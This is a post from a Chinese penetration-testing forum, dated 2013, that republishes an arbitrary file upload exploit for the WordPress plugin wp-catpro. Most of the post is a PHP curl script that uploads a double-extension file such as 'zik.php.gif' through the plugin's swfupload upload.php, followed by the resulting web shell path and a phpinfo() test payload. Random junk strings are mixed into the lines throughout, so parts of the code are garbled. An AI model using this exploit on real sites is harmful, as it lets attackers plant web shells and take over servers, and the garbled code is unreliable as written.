找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress插件wp-catpro任意文件上传
返回列表 发新帖
查看: 3073|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
7 B. V9 k1 q$ _5 ~2 J' j#-----------------------------------------------------------------------
' ~9 q: a8 P4 w" t: O  m1 z2 ~ 7 Z# \7 E! O$ m
作者  => Zikou-16
9 j' z+ o" R5 y. @& b6 ^' h邮箱 => zikou16x@gmail.com
" p3 X0 q0 [9 K! e5 c  g! B- P% Y测试系统 : Windows 7 , Backtrack 5r34 R, M) `) r5 @5 z8 d# H
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip* I. [+ f0 G- o# v% z: ^/ T
####4 ?) j5 ~2 @3 X5 @2 t( P
5 S8 R# P! ~& @7 W: a" S! Q) Y
#=> Exploit 信息:7 {6 B: N/ ]6 ^% T* m8 A
------------------9 E6 `, Q5 ^( P4 K$ ]: f
# 攻击者可以上传 file/shell.php.gif
/ M8 Y- s# w% R4 \# P8 h6 _# ("jpg", "gif", "png")  // Allowed file extensions( x/ J4 O" G/ Q( u/ Z
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
6 Z0 g. g+ H  w8 O9 f1 a9 M# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
4 r1 Z: m) l+ o  `' V# F6 I% ~------------------8 J  y/ o; d0 U( M7 j* Y
3 [( m6 `, W6 F
#=> Exploit
8 G  m" I( O5 e9 b+ r' D5 o-----------+ ?" z. J# Q# p
<?php
7 W' ~7 S6 V# l- y2 Q5 F
3 o8 N; n0 a' d$ u' I! ^# `$uploadfile="zik.php.gif";
8 D& d, |8 {% U# J3 `$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");( C8 \8 T0 j6 }) p  ]+ O
curl_setopt($ch, CURLOPT_POST, true);
  x6 t# A0 {1 q  D8 Ncurl_setopt($ch, CURLOPT_POSTFIELDS,7 H8 O# F5 q6 Y
array('Filedata'=>"@$uploadfile",' C8 Y5 c! S6 M! d+ w$ d7 Y8 ?
'folder'=>'/wp-content/uploads/catpro/'));; \; `" g) N) ]# S9 x( N9 k/ Q7 B
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);0 g, u7 R7 M: S
$postResult = curl_exec($ch);  i6 v. E4 N0 _! K
curl_close($ch);
. ?: U. X( \* P. R
; F6 ?! p( m  {# B- D6 |print "$postResult";
- T( @) L- |; | ; f5 p9 o) y5 c6 t, ]- x$ \+ l
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif: J9 m+ ^: Z. B+ g: f7 n& c
  ?>; \) y* }0 ]# L$ {: C- {( P
<?php
: o( L. d6 M7 A  w& x  }phpinfo();% V! F! K- X8 Y6 ^$ S
?>
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表